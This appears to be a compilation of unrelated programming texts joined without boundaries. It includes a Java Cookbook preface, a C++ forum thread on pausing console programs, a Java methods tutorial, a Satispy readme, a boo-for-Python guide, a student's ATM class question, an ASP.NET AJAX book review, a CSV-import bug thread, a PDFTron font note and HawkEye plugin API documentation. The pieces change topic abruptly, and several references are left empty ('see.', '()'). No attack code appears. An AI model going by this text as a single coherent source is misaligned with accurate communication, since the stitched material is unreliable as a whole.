}

My project is an application that we use at work and many users have Windows XP. Unfortunately, Qt 5.12 is not compatible with Windows XP.

- mrjj Lifetime Qt Champion last edited by

Hi
Ahh, the good old Windows XP. Not as stone dead as they want to believe :) I would check to see if it has been reported. Your .pro file looks pretty normal. It's only when the folder is named new?

If I rename the new folder to new_old, for example, the problem disappears. I also tried Qt 5.8, already installed on my system; same problem. Maybe tomorrow I will try Qt 5.12 and let you know.
https://forum.qt.io/topic/100890/qtcreator-project-with-folder-named-new
CC-MAIN-2020-34
refinedweb
479
71.31
I wanted to use NumPy to compute Fibonacci numbers by raising the matrix [[1, 1], [1, 0]] to the power n:

import numpy

def fib(n):
    return (numpy.matrix("1 1; 1 0")**n).item(1)

print fib(90)  # Gives -1581614984

I also tried linalg.matrix_power, which gives -5.168070885485832e+19 (-51680708854858323072L when converted with int()).

The reason you see negative values appearing is because NumPy has defaulted to using the np.int32 dtype for your matrix. The maximum positive integer this dtype can represent is 2**31 - 1, which is 2147483647. Unfortunately, this is less than the 47th Fibonacci number, 2971215073. The resulting overflow is causing the negative number to appear:

>>> np.int32(2971215073)
-1323752223

Using a bigger integer type (like np.int64) would fix this, but only temporarily: you'd still run into problems if you kept on asking for larger and larger Fibonacci numbers. The only sure fix is to use an unlimited-size integer type, such as Python's int type. To do this, modify your matrix to be of np.object type:

def fib_2(n):
    return (np.matrix("1 1; 1 0", dtype=np.object)**n).item(1)

The np.object type allows a matrix or array to hold any mix of native Python types. Essentially, instead of holding machine types, the matrix is now behaving like a Python list and simply consists of pointers to integer objects in memory. Python integers will be used in the calculation of the Fibonacci numbers now, and overflow is not an issue. This flexibility comes at the cost of decreased performance: NumPy's speed originates from direct storage of machine integer/float types.
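To make the object-dtype approach concrete, here is a self-contained variant. The function name is mine, and I use np.dot in an explicit square-and-multiply loop rather than np.matrix, since np.dot reliably supports object arrays across NumPy versions:

```python
import numpy as np

def fib_exact(n):
    # Hold the 2x2 Fibonacci matrix as Python ints (dtype=object),
    # so arithmetic never wraps around the way np.int32 does.
    base = np.array([[1, 1], [1, 0]], dtype=object)
    result = np.array([[1, 0], [0, 1]], dtype=object)  # identity
    # Square-and-multiply exponentiation via np.dot,
    # which works on object arrays.
    while n:
        if n & 1:
            result = np.dot(result, base)
        base = np.dot(base, base)
        n >>= 1
    # [[1,1],[1,0]]**n == [[F(n+1), F(n)], [F(n), F(n-1)]]
    return result[0, 1]

print(fib_exact(47))  # 2971215073 -- too big for int32, fine as a Python int
print(fib_exact(90))  # 2880067194370816120
```

Because every element is a Python int, fib_exact(47) comes out as the exact value 2971215073 instead of the wrapped-around negative shown above.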
https://codedump.io/share/4ttP4IfIMsfD/1/numpy-matrix-exponentiation-gives-negative-value
CC-MAIN-2018-22
refinedweb
258
59.9
[hackers] [sbase] tail: Add rudimentary support to detect file truncation || sin
From: <git_AT_suckless.org>
Date: Tue, 24 Mar 2015 23:53:39 +0100 (CET)

commit a25a57f6ac74174bfbceeaf1255e64a028338474
Author: sin <sin_AT_2f30.org>
Date: Mon Feb 9 14:41:49 2015 +0000

    tail: Add rudimentary support to detect file truncation

    We cannot in general detect that truncation happened. At the moment
    we use a heuristic to compare the file size before and after a write
    happened. If the new file size is smaller than the old, we correctly
    handle truncation and dump the entire file to stdout. If it so
    happened that the new size is larger or equal to the old size after
    the file had been truncated without any reads in between, we will
    assume the data was appended to the file.

    There is no known way around this other than using inotify or kevent
    which is outside the scope of sbase.

diff --git a/tail.c b/tail.c
index 36fec77..11af1dd 100644
--- a/tail.c
+++ b/tail.c
@@ -1,4 +1,6 @@
 /* See LICENSE file for copyright and license details. */
+#include <sys/stat.h>
+
 #include <limits.h>
 #include <stdint.h>
 #include <stdio.h>
@@ -59,6 +61,7 @@ usage(void)
 int
 main(int argc, char *argv[])
 {
+	struct stat st1, st2;
 	FILE *fp;
 	size_t n = 10, tmpsize;
 	int ret = 0, newline, many;
@@ -96,6 +99,8 @@ main(int argc, char *argv[])
 		if (many)
 			printf("%s==> %s <==\n", newline ?
"\n" : "", argv[0]); + if (stat(argv[0], &st1) < 0) + eprintf("stat %s:", argv[0]); newline = 1; tail(fp, argv[0], n); _AT_@ -108,8 +113,18 @@ main(int argc, char *argv[]) fflush(stdout); } if (ferror(fp)) - eprintf("readline '%s':", argv[0]); + eprintf("readline %s:", argv[0]); clearerr(fp); + /* ignore error in case file was removed, we continue + * tracking the existing open file descriptor */ + if (!stat(argv[0], &st2)) { + if (st2.st_size < st1.st_size) { + fprintf(stderr, "%s: file truncated\n", argv[0]); + rewind(fp); + } + st1 = st2; + } + sleep(1); } } fclose(fp); Received on Tue Mar 24 2015 - 23:53:39 CET This message : [ Message body ] Next message : git_AT_suckless.org: "[hackers] [sbase] Convert tail(1) to use size_t || FRIGN" Previous message : git_AT_suckless.org: "[hackers] [sbase] No need to free the buffer for every call to getline() || sin" Contemporary messages sorted : [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ] This archive was generated by hypermail 2.3.0 : Wed Mar 25 2015 - 00:08:33 CET
http://lists.suckless.org/hackers/1503/6566.html
CC-MAIN-2022-05
refinedweb
435
70.53
Theory: Out with the old, in with the new

Hey EJB Advocate,

It's time to wake up and smell the coffee! EJB 2.x is dead! Long live EJB 3! Just look how much simpler life will get when creating a persistent object like a customer from one of your previous articles:

@Entity
@Table(name="CUSTOMER")
public class Customer implements Serializable {
    private int id;
    private String name;
    private Order openOrder;

    public Customer() {
        super();
    }

    @Id
    @Column(name="CUST_ID")
    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    @Column(name="NAME")
    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    @OneToOne(cascade=CascadeType.ALL, fetch=FetchType.EAGER)
    @JoinColumn(name="OPEN_ORDER_ID", referencedColumnName="ORDER_ID")
    public Order getOpenOrder() {
        return openOrder;
    }

    public void setOpenOrder(Order openOrder) {
        this.openOrder = openOrder;
    }
}

I only need to create a simple POJO and annotate it. I don't have to inherit from anything. No separate home, interface, or deployment descriptor is required. And I don't have to perform a vendor-specific mapping step!

The code in a client program using EJB 3 is even simpler. Let's say I want to get the open order associated with the customer whose key is an integer called customerId:

@PersistenceContext(unitName="db2")
EntityManager em;

try {
    Customer c = (Customer) em.find(Customer.class, new Integer(customerId));
    Order o = c.getOpenOrder();
    return o;
} catch (EntityNotFoundException e) {
    throw new CustomerDoesNotExist(customerId);
}

Because the one EntityManager instance serves as the "home" to all entities, there is no JNDI lookup required. It doesn't get any simpler than that. So tell me. Why go back to hamburger after eating steak?
Signed,
Never Going Back

Practice: Not so fast, there are tradeoffs to consider

Dear Never Going Back,

Because your note was a bit cheeky, I will (with tongue in cheek) take the opportunity to point out that the entity EJB component you are talking about is actually part of the Java Persistence API (JPA), which is a separate but related specification spun off of JSR 220. So, it is more correct to say something like "using JPA is simpler".

But seriously, I am glad you found a standard approach to persistence that you can live with. Too many folks I talk to end up inventing their own approach to persistence. I suppose that the "back" in your signing "Never Going Back" implies that you weren't one of these folks.

That said (and at the risk of making you unhappy again), the EJB Advocate is going to very carefully parse the advantages you point out so that you can truly weigh the benefits of JPA versus CMP entity components:

JPA entity components are not POJOs. You first mentioned that you simply create a POJO and annotate it (with @Entity among other things) to create a JPA style entity. That is true. But strictly speaking, most do not consider a persistence mechanism to be based on POJOs unless it can be used with an existing -- unmodified -- simple Java class.

You might also want to think back to the EJB 1.x days when entity components were more like POJOs. The instance variables were declared as part of the bean implementation, which was a concrete class. You "annotated" the class by declaring it an entity EJB and implemented the lifecycle methods like ejbLoad() and ejbStore() (or left them up to the deployment tools). One reason that this approach was abandoned is because it made loading the CMP fields an all or nothing affair. The EJB 2.x approach enables the flexibility to do performance enhancing tricks like mapping the get<Property>() methods onto a database cursor or stream implementation, reducing the number of transformations.
JPA allows for "lazily" loading the properties through annotation, but as we will see in a later point, this approach creates its own problems when coupled with thinking that the entity is a POJO.

Neither JPA nor EJB 2.x requires that you subclass (extend) any particular class. You then mentioned that you need not "inherit" from anything when using JPA, implying that EJB 2.x entities do. This implication is not true. Consider a typical EJB 2.x entity component class declaration:

public abstract class CustomerBean implements EntityBean ...

A class (whether abstract or concrete) that implements an interface does not really inherit anything from the interface it implements. Implementing an interface is simply a marker that the class can play a given role in the application -- exactly like the @Entity annotation is intended to do. This distinction is important because Java only supports single inheritance with respect to implementation. You may only extend a single class and inherit its method implementations. You can implement as many interfaces as you want. And because an EJB 2.x entity is an abstract class, you need not implement any of the various EJB lifecycle methods associated with the EntityBean interface like ejbLoad() and ejbStore(). These implementations can be deferred to the deployment tool provided by the vendor.

JPA entity components do not support multiple views. Next, you pointed out that you need not create an interface or home with a JPA entity. True. But this simplicity comes with a tradeoff: you directly access the implementation class. The limitation is that you only get a single view of the component. Java interfaces are powerful in that you can provide views of an implementation component that are customized to the needs of a client. EJB 2.x entity components maintain the concept of separating the implementation from the interfaces it supports. For example, you can provide both a remote and a local view of an entity.
Why would you want to provide a remote interface to an entity EJB component when a well known best practice is to use a facade? In a previous EJB Advocate article, we discussed how to exploit custom home methods on entity components to serve as a built in facade. Since a facade is often used remotely, a remote home interface could be provided that includes one or more custom methods like so:

public interface CustomerHome extends EJBHome {
    CustomerData ejbHomeGetOpenOrderForCustomer(int customerId)
    ...
}

Notice how this remote interface does not have any create() or find() methods. This deliberate omission ensures that an instance of the Customer entity can never be accessed remotely. The local interface and home to the same bean implementation would expose the create and find methods along with the appropriate get and set methods (that possibly represent CMRs, as described in yet another EJB Advocate article). And, that said, most vendors of EJB-related tooling, like IBM Rational Application Developer for WebSphere software, generate the homes and interfaces in one step with a Wizard tool. Some even make it possible to start with the bean implementation, like a POJO, and promote methods to the interface and home as desired.

JPA entity components mix implementation details into your POJOs. Another "advantage" you called out about JPA has to do with the ability to skip creating a separate deployment descriptor and skip a vendor-specific mapping step. That is all well and good -- especially the part about standard mappings to relational data stores -- but there is a tradeoff. You embed the implementation details in the code, which makes the object even less like the simple POJO that you seemed to crave. One of the best features of EJB 2.x entity components is that the deployer could modify the details of how a given business object was made persistent completely independently of the bean provider.
There is no reason that vendors cannot adopt a similar standard set of mapping annotations as part of an EJB 2.x style deployment descriptor to simplify the mapping step.

JPA entity components are still best used behind a facade. Finally, you rightly pointed out that there is only one EntityManager implementation, which eliminates the need to do a JNDI lookup, and makes using a JPA entity component extremely easy. However, you failed to note that if you don't use the JPA entity within a transactional context, you need to do an explicit save to the EntityManager to persist any changes. Another aspect of JPA you failed to mention is that if an entity is declared to be "lazily" loaded in the annotations and is subsequently detached from the context (that is, the transaction ends), then the untouched fields are undefined. Having to explicitly manage the transactional context would add complexity to the JPA programming model. So it is still a best practice to use a session facade (whether a new EJB 3 style or an old EJB 2.x style). If you choose to return the POJO from the facade, you will either need to set the loading to "eager" or to touch all the fields in the JPA entity. With EJB 2.x custom home methods, a session is not absolutely required.

As you can see, most of the benefits of EJB 3 and JPA that you mention involve simplifying assumptions that may not work for all situations. You have to decide for yourself whether you can live with those assumptions. In cases where you can, I hope you see that almost all of them can be applied to the EJB 2.x specification through deployment tooling. Finally, even the JPA specification mentions that EJB 2.x is still expected to be used after EJB 3 and JPA are finalized. Therefore (with apologies to Mark Twain), the EJB Advocate believes that the rumors of the demise of EJB 2.x have been greatly exaggerated.

OK then,
Your EJB Advocate

Conclusion

This exchange explored some fundamental questions about simplicity.
For example, is it better to have a complex system that enables all the flexibility you need? Or is it better to have a simple system that makes it easy to handle the average case? In the musings above, the EJB Advocate wondered: why not provide for both by enabling flexibility but having a default case that makes things simple?

For those that prefer an object oriented approach to application development, EJB 2.x may still be the better approach, since it exploits all the features of Java that make it such a powerful language, especially the separation of interface from implementation.

Resources

- The EJB Advocate: Making entity EJB components perform, Part 2, by Geoffrey Hambrick.
http://www.ibm.com/developerworks/websphere/techjournal/0602_ejba/0602_ejba.html
CC-MAIN-2013-48
refinedweb
1,717
54.12
gocept.jsform 0.8

Next generation forms in JavaScript

The gocept.jsform distribution is a JavaScript library for simple creation of forms in your client's browser. It just needs a JSON data structure and creates a form with auto-saving fields from it. It uses Knockout for data binding, json-template for templating and jQuery for DOM manipulation and Ajax calls.

Requirements

If you have a server using fanstatic to include resources, just do:

from gocept.jsform.resource import jsform
jsform.need()

This will require all needed resources like jquery, knockout, json-template, widgets and the code to set up and run gocept.jsform itself.

Without fanstatic, you should include the following resources by hand:

- helpers.js
- widgets.js
- jsform.js

You can find them in the resources directory in this package.

Usage

All you need to start creating forms is:

<div id="replace_this_with_my_form"></div>
<script type="text/javascript">
  var my_form = new gocept.jsform.Form('replace_this_with_my_form');
  my_form.load('/form_data.json');
</script>

This will inject the form in the container with the id replace_this_with_my_form, load the form data via Ajax from the url form_data.json and create input fields according to the content of form_data.json.

form.load() accepts JavaScript objects as data or a url (like in the example above). It then guesses which field widget to load by means of the datatype of your field:

my_form.load(
    {firstName: '',  // will result in an input field with type="text"
     title: [{id: 'mr', value: 'Mister'},
             {id: 'mrs', value: 'Miss', selected: true}],  // will result in a select box
     needs_glasses: false});  // will result in a checkbox

gocept.jsform comes with basic templates for these three use cases. Of course you can provide your own templates for either the form or the fields themselves. Please refer to the customization section for further information.

Tests

The tests are written in Jasmine and run using Selenium WebDriver.
Customization

There are various options which can be passed to customize the HTML output and the behaviour of gocept.jsform.

Providing a save url for the server

The great thing about gocept.jsform is that it automatically pushes changes in your form fields to the server. For that to work you need to specify a url where gocept.jsform should propagate changes to:

var form = new gocept.jsform.Form('my_form', {save_url: '/save.json'});

On every change, the following information is pushed to that url:

- id: the name of the field (e.g. firstname)
- value: the new value for that field (e.g. Bob)

The server should now validate the given data. If saving went fine, it must return {status: 'success'}; if there was a (validation) error, it must return e.g. {status: 'error', msg: 'Not a valid email address'}. The error will then be displayed next to the widget.

Customizing the form template

The default behaviour is to simply append every new field in the form tag. If you would like to customize the order of your fields or just need another boilerplate for your form, you can use a custom form template with containers for all or just some of the fields:

var template = new jsontemplate.Template(
    ['<form method="POST" action="{action}" id="{form_id}">',
     '<table><tr><td class="firstname"><span id="firstname" /></td>',
     '<td class="lastname"><span id="lastname" /></td></tr></table>',
     '</form>'].join(''),
    {default_formatter: 'html'});
var form = new gocept.jsform.Form('my_form', {form_template: template});
form.load({firstname: 'Max', lastname: 'Mustermann'});

This will replace the span containers with id firstname and lastname with the appropriate input fields.

Customizing field widgets

You can either customize widgets by their type (e.g. all fields rendered for strings) or customize single widgets by their name.
Customization by field type

You can overwrite the default templates by providing your own templates in the options dict passed during form initialization:

    var form = new gocept.jsform.Form(
        'my_form',
        {string_template: my_input_template,
         object_template: my_select_template,
         boolean_template: my_checkbox_template});

For every string value, your input template would be rendered instead of the default text input field; the same goes for lists and boolean values.

Customization by field name

Imagine you want radio buttons instead of a select field:

    var template = new jsontemplate.Template(
        ['<div class="title">Title:',
         '{.repeated section value}',
         '  <div>',
         '    <input type="radio" name="{name}" value="{id}" class="{id}"',
         '           data-bind="checked: {name}" /> {value}',
         '  </div>',
         '{.end}',
         '</div>'].join(''),
        {default_formatter: 'html'});
    var form = new gocept.jsform.Form('my_form');
    form.load({title: [{id: 'mr', value: 'Mr.'},
                       {id: 'mrs', value: 'Mrs.'}]},
              {title: {template: template}});

You can pass the load method a JS object containing customizations for each field. One of these customization options is template, which in the above example results in rendering two radio buttons instead of the default select box. You can also specify a label or other options for the fields:

    var template = new jsontemplate.Template(
        ['{label}: <input type="text" name="{name}" value="{default}"',
         ' data-bind="value: {name}" {readonly} />'].join(''),
        {default_formatter: 'html', undefined_str: ''});
    var form = new gocept.jsform.Form('my_form');
    form.load({firstname: 'Sebastian'},
              {firstname: {template: template,
                           label: 'First name',
                           default: 'Max'}});

Developing gocept.jsform

Change log for gocept.jsform

0.8 (2013-12-10)

- Fixed: jsform did not render in IE8 if the form template started with a line break.

0.7 (2013-12-03)

- Add ability to send a CSRF token with every request. This token must be available via the id csrf_token (can be customized) in the DOM.
- Added minified versions of JavaScript resources.
0.6 (2013-09-06)

- Bugfix: Use indexOf instead of startsWith, which is not available in all browsers.

0.5 (2013-09-06)

- Declare the for attribute on form labels.
- Store "save on change" subscriptions so they can be cancelled.
- Ignore null values for data fields. (#1)

0.4 (2013-08-27)

- Made it possible to define templates as template files on the file system.

0.3 (2013-08-27)

- Add events after-load and after-save.
- Fix JSON serialization to be able to handle Knockout observables.
- Added reload functionality to the form class.

0.2 (2013-08-26)

- Made it possible to preselect values in arrays when the form is rendered.
- Changed form submit behaviour:
  - Default submit type is now POST instead of GET. (Change it with the save_type option.)
  - Data is now submitted as JSON type.

0.1 (2013-08-17)

- Initial release.

Author: Sebastian Wehrmann <sw@gocept.com>, Maik Derstappen <md@derico.de>
Keywords: form javascript jquery client
License: ZPL 2.1
https://pypi.python.org/pypi/gocept.jsform/0.8
03 December 2008 18:11 [Source: ICIS news]

PARIS (ICIS news)--Changes to the EU’s Emissions Trading Scheme (EU ETS) will not force chemical companies to relocate, according to a new study.

For most chemical companies, the impact of having to buy carbon emission rights after 2013 will be small, according to the study by Climate Strategies, a European network of climate policy experts.

The European Commission and Parliament have proposed a gradual phase-out of free allowances by 2020, with a final decision in 2011 on which substances are at risk of “carbon leakage” – the relocation of production facilities, jobs and emissions to outside the EU.

Many chemical companies have claimed that unless they continue to receive CO2 allowances for free, they will be forced to relocate. This has led many EU member states to call for free allowances for all energy- and carbon-intensive industries until 2020 if their cost increase exceeds a threshold level.

But the study suggests that only a small number of chemicals are likely to be affected by carbon leakage, and that they will need some form of support to compete on price with rival products that are not subject to the EU ETS.

In addition, the study said that the Commission’s proposed 2011 decision on which products are most at risk from carbon leakage must be carried out properly, with product-specific analyses.

The report’s co-author, Dr. Karsten Neuhoff, warned: “Protecting all the most polluting activities from the real cost of carbon is not the way to get industry to invest in the creative solutions to climate change.”
http://www.icis.com/Articles/2008/12/03/9176677/eu-ets-changes-will-not-force-leakage-study.html
JDK 1.5, code-named Tiger, is an exciting change to the Java landscape. It introduces several major new facilities, such as generic types for better data structuring, metadata for annotating Java© classes in a flexible but well-defined manner, new pattern-based mechanisms for reading data, and a new mechanism for formatted printing. In addition, a much larger number of smaller but important changes add up to a new release that is a must for Java developers. It will be quite some time before these mechanisms are fully understood and in wide circulation, but you will want to know about them right away. I wrote in the Afterword to the first edition that “writing this book has been a humbling experience.” I should add that maintaining it has been humbling, too. While many reviewers and writers have been lavish with their praise—one very kind reviewer called it “arguably the best book ever written on the Java programming language”—I have been humbled by the number of errors and omissions in the first edition. In preparing this edition, I have endeavored to correct these. At the same time I have added a number of new recipes and removed a smaller number of old ones. The largest single addition is Chapter 8, which covers generic types and enumerations, features that provide increased flexibility for containers such as Java Collections. Now that Java includes a regular expressions API, Chapter 4 has been converted from the Apache Regular Expressions API to JDK 1.4 Regular Expressions. I have somewhat hesitantly removed the chapter on Network Web, including the JabaDot Web Portal Site program. This was the longest single program example in the book, and it was showing signs of needing considerable refactoring (in fact, it needed a complete rewrite). In writing such a web site today, one would make much greater use of JSP tags, and almost certainly use a web site framework such as Struts (), SOFIA (), or the Spring Framework () to eliminate a lot of the tedious coding. 
Or, you might use an existing package such as the Java Lobby’s JLCP. Material on Servlets and JavaServer pages can be found in O’Reilly’s Java Servlet & JSP Cookbook by Bruce W. Perry. Information on Struts itself can be found in Chuck Cavaness’s Programming Jakarta Struts (O’Reilly). Information on SOAP-based web services is included in O’Reilly’s Java Web Services by Dave Chappell and Tyler Jewell, so this topic is not covered here. While I’ve tested the examples on a variety of systems and provide Ant scripts to rebuild everything, I did most of the new development and writing for this edition using Mac OS X, which truly is “Unix for the masses,” and which provides one of the best-supported out-of-the-box Java experiences. Mac OS X Java does, however, suffer a little from “new version lag” and, since 1.5 was not available for the Mac by the time this edition went to press, the JDK 1.5 material was developed and tested on Linux and Windows. I wish to express my heartfelt thanks to all who sent in both comments and criticisms of the book after the first English edition was in print. Special mention must be made of one of the book’s German translators,[1] Gisbert Selke, who read the first edition cover to cover during its translation and clarified my English. Gisbert did it all over again for the second edition and provided many code refactorings, which have made this a far better book than it would be otherwise. Going beyond the call of duty, Gisbert even contributed one recipe (Recipe 26.4) and revised some of the other recipes in the same chapter. Thank you, Gisbert! The second edition also benefited from comments by Jim Burgess, who read large parts of the book. Comments on individual chapters were received from Jonathan Fuerth, Kim Fowler, Marc Loy, and Mike McCloskey. My wife Betty and teenaged children each proofread several chapters as well. 
The following people contributed significant bug reports or suggested improvements from the first edition: Rex Bosma, Rod Buchanan, John Chamberlain, Keith Goldman, Gilles-Philippe Gregoire, B. S. Hughes, Jeff Johnston, Rob Konigsberg, Tom Murtagh, Jonathan O’Connor, Mark Petrovic, Steve Reisman, Bruce X. Smith, and Patrick Wohlwend. My thanks to all of them, and my apologies to anybody I’ve missed. My thanks to the good guys behind the O’Reilly “bookquestions” list for fielding so many questions. Thanks to Mike Loukides, Deb Cameron, and Marlowe Shaeffer for editorial and production work on the second edition.

If you know a little Java, great. If you know more Java, even better! This book is ideal for anyone who knows some Java and wants to learn more. If you don’t know any Java yet, you should start with one of the more introductory books from O’Reilly, such as Head First Java or Learning Java if you’re new to this family of languages, or Java in a Nutshell if you’re an experienced C programmer.

I started programming in C in 1980 while working at the University of Toronto, and C served me quite well through the 1980s and into the 1990s. In 1995, as the nascent language Oak was being renamed Java, I had the good fortune to be told about it by my colleague J. Greg Davidson. I sent an email to the address Greg provided:

> Hi. A friend told me about WebRunner(?), your extensible network
> browser. It and Oak(?) its extension language, sounded neat. Can
> you please tell me if it's available for play yet, and/or if any
> papers on it are available for FTP?

James Gosling, Java’s inventor, mailed back in March 1995:

> Check out (oak got renamed to java and webrunner got renamed to
> hotjava to keep the lawyers happy)

I downloaded HotJava and began to play with it. At first I wasn’t sure about this newfangled language, which looked like a mangled C/C++.
I wrote test and demo programs, sticking them a few at a time into a directory that I called javasrc to keep it separate from my C source (because often the programs would have the same name). And as I learned more about Java, I began to see its advantages for many kinds of work, such as the automatic memory reclaim and the elimination of pointer calculations. The javasrc directory kept growing. I wrote a Java course for Learning Tree,[2] and the directory grew faster, reaching the point where it needed subdirectories. Even then, it became increasingly difficult to find things, and it soon became evident that some kind of documentation was needed. In a sense, this book is the result of a high-speed collision between my javasrc directory and a documentation framework established for another newcomer language. In O’Reilly’s Perl Cookbook, Tom Christiansen and Nathan Torkington worked out a very successful design, presenting the material in small, focused articles called “recipes.” The original model for such a book is, of course, the familiar kitchen cookbook. Using the term “cookbook” to refer to an enumeration of how-to recipes relating to computers has a long history. On the software side, Donald Knuth applied the “cookbook” analogy to his book The Art of Computer Programming (Addison Wesley), first published in 1968. On the hardware side, Don Lancaster wrote The TTL Cookbook (Sams, 1974). (Transistor-transistor logic, or TTL, was the small-scale building block of electronic circuits at the time.) Tom and Nathan worked out a successful variation on this, and I recommend their book for anyone who wishes to, as they put it, “learn more Perl.” Indeed, the work you are now reading strives to be the book for the person who wishes to “learn more Java.” The code in each recipe is intended to be largely self-contained; feel free to borrow bits and pieces of any of it for use in your own projects. 
The code is distributed with a Berkeley-style copyright, just to discourage wholesale reproduction. I’m going to assume that you know the basics of Java. I won’t tell you how to println a string and a number at the same time, or how to write a class that extends Applet and prints your name in the window. I’ll presume you’ve taken a Java course or studied an introductory book such as O’Reilly’s Head First Java, Learning Java, or Java in a Nutshell. However, Chapter 1 covers some techniques that you might not know very well and that are necessary to understand some of the later material. Feel free to skip around! Both the printed version of the book and the electronic copy are heavily cross-referenced. For example, one of the programs in the book reads the top-level directory of the place where I keep all my Java example source code and builds a browser-friendly index.html file for that directory. For another example, the body of the first edition was partly composed in XML: I used XML to type in and mark up the original text of some of the chapters of this book, and the text was then converted to the publishing software format. JDK 1.4 was the first release to include this powerful technology in the core API; I also mention several third-party XML packages. A new chapter was added in this section of the second edition. JDK 1.5 introduced a new dimension to the notion of data structuring by adapting the C++ notion of templates to the Java Collections; the result, known as Generics, is the main subject of Chapter 8. Despite some syntactic resemblance to procedural languages such as C, Java is at heart an object-oriented programming language. Chapter 9 discusses some of the key notions of OOP as it applies to Java, including the commonly overridden methods of java.lang.Object and the important issue of Design Patterns. The next few chapters deal with aspects of traditional input and output.
Chapter 10 details the rules for reading and writing files. (Don’t skip this if you think files are boring, as you’ll need some of this information in later chapters: you’ll read and write on serial or parallel ports in Chapter 12 and on a socket-based network connection in Chapter 16!) Chapter 11 shows you everything else about files—such as finding their size and last-modified time—and about reading and modifying directories, creating temporary files, and renaming files on disk. Chapter 12 shows how you can use the javax.comm API to read/write on serial and parallel ports using a standard Java API. Chapter 13 leads us into the GUI development side of things. This chapter is a mix of the lower-level details, such as drawing graphics and setting fonts and colors, and very high-level activities, such as controlling a video clip or movie. In Chapter 14, I cover the higher-level aspects of a GUI, such as buttons, labels, menus, and the like—the GUI’s predefined components. Once you have a GUI (really, before you actually write it), you’ll want to read Chapter 15, so your programs can work as well in Akbar, Afghanistan, Algiers, Amsterdam, or Angleterre as they do in Alberta, Arkansas, or Alabama . . . . Since Java was originally promulgated as “the programming language for the Internet,” it’s only fair that we spend some of our time on networking in Java. Chapter 16 covers the basics of network programming from the client side, focusing on sockets. We’ll then move to the server side in Chapter 17. In Chapter 18, you’ll learn more client-side techniques. Programs on the Net often need to generate electronic mail, so this section ends with Chapter 19. Chapter 20 covers the essentials of the Java Database Connectivity (JDBC) and Java Data Objects (JDO) packages. Later chapters go further afield, covering such secrets as how to write API cross-reference documents mechanically (“become a famous Java book author in your spare time!”) and how to mix Java with code written in C/C++ or other languages.
There isn’t room in an 800-page book for everything I’d like to tell you about Java. Chapter 27 presents some closing thoughts and a link to my online summary of Java APIs that every Java developer should know about. No two programmers or writers will agree on the best order for presenting all the Java topics. To help you find your way around, I’ve included extensive cross-references, mostly by recipe number. Java has gone through five major versions. The first official release was JDK 1.0, and its last bug-fixed version was 1.0.2. The second major release is Java JDK 1.1, and the latest bug-fixed version is 1.1.9, though it may be up from that by the time you read this book. The third major release, in December 1998, was to be known as JDK 1.2, but somebody at Sun abruptly renamed JDK 1.2 at the time of its release to Java 2, and the implementation is known as Java 2 SDK 1.2. The current version as of the writing of the first edition of this book was Java 2 SDK 1.3 (JDK 1.3), which was released in 2000. As the first edition of this book went to press, Java 2 Version 1.4 was about to appear; it entered beta (which Sun calls “early access”) around the time of the book’s completion so I could mention it only briefly. The second edition of this book looks to have better timing; Java 2 Version 1.5 is in beta as I am updating the book. This book is aimed at the fifth version, Java 2 Standard Edition, Version 1.5. By the time of publication, I expect that all Java projects in development will be using JDK 1.4, with a very few wedded to earlier versions for historical reasons. I have used several platforms to test this code for portability. I’ve tested with Sun’s Linux JDK. For the mass market, I’ve tested many of the programs on Sun’s Win32 (Windows 2000/XP/2003) implementation. And, “for the rest of us,” I’ve done most of my recent development using Apple’s Mac OS X Version 10.2.x and later.
However, since Java is portable, I anticipate that the vast majority of the examples will work on any Java-enabled platform, except where extra APIs are required. Not every example has been tested on every platform, but all have been tested on at least one—and most on more than one. The Java API consists of two parts: core APIs and noncore APIs. The core is, by definition, what’s included in the JDK that you download for free from. Noncore is everything else. But even this “core” is far from tiny: it weighs in at around 50 packages and well over 2,000 public classes, averaging around 12 public methods each. Programs that stick to this core API are reasonably assured of portability to any Java platform. The noncore APIs are further divided into standard extensions and nonstandard extensions. All standard extensions have package names beginning with javax.[3] (and reference implementations are available from Sun). A Java licensee (such as Apple or IBM) is not required to implement every standard extension, but if it does, the interface of the standard extension should be adhered to. This book calls your attention to any code that depends on a standard extension. Little code here depends on nonstandard extensions, other than code listed in the book itself. My own package, com.darwinsys, contains some utility classes used here and there; you will see an import for this at the top of any file that uses classes from it. In addition, two other platforms, the J2ME and the J2EE, are standardized. Java 2 Micro Edition is concerned with small devices such as handhelds (PalmOS and others), cell phones, fax machines, and the like. Within J2ME are various “profiles” for different classes of devices. At the high end, the Java 2 Enterprise Edition (J2EE) is concerned with building large, scalable, distributed applications. Servlets, JavaServer Pages, JavaServer Faces, CORBA, RMI, JavaMail, Enterprise JavaBeans© (EJBs), Transactions, and other APIs are part of the J2EE. 
J2ME and J2EE packages normally begin with “javax” as they are not core J2SE packages. This book does not cover J2ME at all but includes a few of the J2EE APIs that are also useful on the client side, such as RMI and JavaMail. As mentioned earlier, coverage of Servlets and JSPs from the first edition of this book has been removed as there is now a Servlet and JSP Cookbook. O’Reilly publishes, in my opinion, the best selection of Java books on the market. As the API continues to expand, so does the coverage; you can find the latest versions and ordering information in O’Reilly’s catalog of Java books. Head First Java offers a much more whimsical introduction to the language and is recommended for the less experienced developer. A definitive (and monumental) description of programming the Swing GUI is Java Swing by Marc Loy, Robert Eckstein, Dave Wood, James Elliott, and Brian Cole. Java Virtual Machine, by Jon Meyer and Troy Downing, will intrigue the person who wants to know more about what’s under the hood. This book is out of print but can be found used and in libraries. Java Network Programming and Java I/O, both by Elliotte Rusty Harold, and Database Programming with JDBC and Java, by George Reese, are also useful references. There are many more; see the O’Reilly web site for an up-to-date list. Donald E. Knuth’s The Art of Computer Programming has been a source of inspiration to generations of computing students since its first publication by Addison Wesley in 1968. Volume 1 covers Fundamental Algorithms, Volume 2 is Seminumerical Algorithms, and Volume 3 is Sorting and Searching. The remaining four volumes in the projected series are still not completed.
